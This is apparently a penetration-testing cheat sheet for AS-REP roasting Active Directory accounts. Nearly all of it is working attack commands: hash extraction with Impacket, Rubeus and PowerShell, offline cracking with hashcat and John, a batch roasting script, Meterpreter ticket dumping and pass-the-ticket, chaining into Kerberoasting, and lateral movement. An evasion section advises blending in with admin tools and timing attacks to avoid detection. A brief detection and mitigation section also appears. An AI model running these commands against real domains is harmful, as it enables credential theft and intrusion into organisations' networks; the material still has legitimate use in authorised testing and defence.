AS-REP Roasting
AS-REP roasting exploits Kerberos users with Pre-Authentication disabled, allowing attackers to request valid Kerberos tickets without valid credentials and crack them offline.
Vulnerability Overview
- Target: Users with “Do not require Kerberos pre-authentication” enabled
- Impact: Offline password cracking of domain user accounts
- Requirements: Network access to DC, ability to enumerate users
- Mitigation: Enable pre-authentication (default in modern Windows)
User Enumeration
Finding AS-REP Roastable Users
# Impacket - GetNPUsers.py
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/ -usersfile users.txt -no-pass -format john
# Rubeus
Rubeus.exe asreproast /format:john /outfile:hashes.txt
# AD enumeration
ldapsearch -x -H ldap://192.168.1.100 \
-b "CN=Users,DC=domain,DC=local" \
"(userAccountControl:1.2.840.113556.1.4.803:=4194304)" \
samAccountNameAttacking AS-REP Roastable Users
Impacket (GetNPUsers.py)
Enumerate Domain
# Get TGT for all AS-REP roastable users
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/
# Specify users file
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/ -usersfile users.txt
# Format for hashcat
python3 GetNPUsers.py -dc-ip 192.168.1.100 -format hashcat DOMAIN.LOCAL/ -usersfile users.txt -outfile hashes.txt
# Format for John
python3 GetNPUsers.py -dc-ip 192.168.1.100 -format john DOMAIN.LOCAL/ -usersfile users.txt -outfile hashes.txtOutput Format
# Output: AS-REP hash ready for cracking
$krb5asrep$23$user@DOMAIN.LOCAL:hash_data
# Extract hash
cat hashes.txt | cut -d':' -f 2- > crack.txtRubeus (C# Tool)
# Basic AS-REP roasting
Rubeus.exe asreproast /format:john /outfile:hashes.txt
# Target specific users
Rubeus.exe asreproast /user:user1 /user:user2 /format:john
# Specify DC
Rubeus.exe asreproast /dc:192.168.1.100 /format:john
# Roast and crack immediately
Rubeus.exe asreproast /format:john /outfile:hashes.txt && hashcat -m 18200 hashes.txt wordlist.txt
# Silent roasting (no output)
Rubeus.exe asreproast /format:john /outfile:hashes.txt /nowrapPowerShell (Invoke-ASREPRoast)
# Using Invoke-ASREPRoast from PowerView
Invoke-ASREPRoast -Outputfile roasted.txt
# Specify target domain
Invoke-ASREPRoast -Domain DOMAIN.LOCAL -Outputfile roasted.txt
# Format for hashcat
Invoke-ASREPRoast -Domain DOMAIN.LOCAL -Format Hashcat -Outputfile hashes.txtCredential Cracking
Hashcat
# Identify hash mode
# -m 18200 = Kerberos 5 AS-REP etype 23 (RC4)
# -m 19700 = Kerberos 5 AS-REP etype 17 (AES)
# -m 19800 = Kerberos 5 AS-REP etype 18 (AES)
# Dictionary attack
hashcat -m 18200 hashes.txt wordlist.txt
# Brute force (slow for password cracking)
hashcat -m 18200 hashes.txt -a 3 ?a?a?a?a?a?a?a?a
# Rule-based attack
hashcat -m 18200 hashes.txt wordlist.txt -r rules/best64.rule
# Mask attack (known password pattern)
hashcat -m 18200 hashes.txt -a 3 -1 ?d ?l?l?l?d?d?d?d
# Pattern: letters, letters, letters, digits, digits, digits, digits
# Hybrid attack
hashcat -m 18200 hashes.txt wordlist.txt -a 6 -1 ?d ?l?a?a?a?dJohn the Ripper
# Dictionary attack
john --format=krb5asrep hashes.txt --wordlist=wordlist.txt
# Incremental mode (brute force)
john --format=krb5asrep hashes.txt --incremental
# Show cracked passwords
john --show hashes.txt
# Wordlist with rules
john --format=krb5asrep hashes.txt --wordlist=wordlist.txt --rulesLarge-Scale Attacks
Batch AS-REP Roasting
#!/bin/bash
# Enumerate all domain users and roast
# Get all users
GetADUser_List.py > users.txt
# Roast all
for user in $(cat users.txt); do
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/$user -no-pass -format john 2>/dev/null
done | tee all_hashes.txt
# Crack
hashcat -m 18200 all_hashes.txt wordlist.txt -o cracked.txtDistributed Cracking
# Split hashes for distributed cracking
split -n l/4 hashes.txt hashes_chunk_
# Worker 1-4 crack their portion
hashcat -m 18200 hashes_chunk_aa wordlist.txt -o results_1.txt
hashcat -m 18200 hashes_chunk_ab wordlist.txt -o results_2.txt
# ... etc
# Combine results
cat results_*.txt > cracked_final.txtAdvanced Exploitation
AS-REP Roasting with Pre-Auth Disabled
# Meterpreter approach
# 1. Obtain shell on domain-joined machine
# 2. Load kiwi module
meterpreter > load kiwi
# 3. Dump TGT
meterpreter > kerberos_ticket_dump
# 4. Pass-the-Ticket
meterpreter > kerberos_ticket_use base64_ticketCombining with Other Attacks
# Chain AS-REP with Kerberoasting
# 1. Crack AS-REP hash to get password
# 2. Use password to request service tickets
# 3. Crack service ticket hash
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/ -format hashcat -outfile asrep.txt
hashcat -m 18200 asrep.txt wordlist.txt -o asrep_cracked.txt
# 4. Use cracked password for kerberoasting
Rubeus.exe kerberoast /user:service_account /password:cracked_passwordDetection and Mitigation
Detection
# Monitor failed authentication attempts
Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4768)]]" | Select-Object TimeCreated, Message
# Check for multiple failed pre-auth attempts
Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4771)]]" -MaxEvents 100 | Group-Object ActivityID | Where-Object Count -gt 10Mitigation
# Enable pre-authentication (PowerShell)
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Set-ADAccountControl -DoesNotRequirePreAuth $false
# Verify pre-auth enabled
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select-Object SamAccountName
# Should return empty list
# Group Policy setting
# Computer Configuration > Windows Settings > Security Settings > Account Policies > Kerberos Policy
# > Enforce user logon restrictions: AlwaysOffensive Operations
Pre-Engagement
# Identify AS-REP roastable accounts
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/ 2>/dev/null | tee asrep_targets.txt
# Count potential targets
wc -l asrep_targets.txtExecution
# Extract all AS-REP hashes
python3 GetNPUsers.py -dc-ip 192.168.1.100 -format hashcat DOMAIN.LOCAL/ -outfile asrep_hashes.txt
# Transfer to cracking machine
# ... network transfer ...
# Crack hashes
hashcat -m 18200 asrep_hashes.txt wordlist.txt -o cracked.txt --logfile crack.log
# Monitor progress
watch tail crack.logPost-Exploitation
# Use cracked passwords for lateral movement
# Test credentials
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/user:password
# If successful, credential is valid
# Use for:
# - PSExec lateral movement
# - WMI execution
# - RDP access
# - Additional enumerationTools Comparison
| Tool | Language | Features | Advantages |
|---|---|---|---|
| GetNPUsers.py | Python | Enumeration, extraction | Fast, flexible output |
| Rubeus | C# | Multi-format output | Single executable, no dependencies |
| Invoke-ASREPRoast | PowerShell | Domain enumeration | Native Windows, stealthy |
OPSEC Considerations
- AS-REP roasting generates authentication traffic
- Multiple failed pre-auth attempts appear in logs
- Use legitimate tools (Rubeus) to blend with normal admin tools
- Schedule roasting during business hours
- Limit scope to specific OUs/user groups
- Monitor for detection (alerts may fire before successful crack)
Wordlists and Rules
# Best wordlists for domain password cracking
# - rockyou.txt (most common)
# - seclists/Passwords/Common-Credentials
# - Jumbo John password lists
# Rules increase success rate 10-30%
# - OneRule (massive rule set)
# - best64.rule (balanced)
# - d3ad0ne.rule (targeted rules)
# Generate custom rules
cat > custom.rule << EOF
# Capitalize first letter
c o
# Append year
$2$0$2$3
EOF
hashcat -m 18200 hashes.txt wordlist.txt -r custom.ruleTroubleshooting
# Hash extraction fails
# Verify DC IP: ping 192.168.1.100
# Check network connectivity: nslookup DOMAIN.LOCAL
# Hashcat recognizes wrong hash type
# Check format: head hashes.txt | cut -d':' -f1
# Compare to hashcat hash examples
# Cracking too slow
# Use GPU: hashcat -d 1 (CUDA) or -d 2 (OpenCL)
# Increase attack speed: -O flag
# Reduce hash count: filter weak passwords
# Hash format errors
# Validate format: john --list=formats | grep krb5
# Convert format: hashcat inline_format -> john_format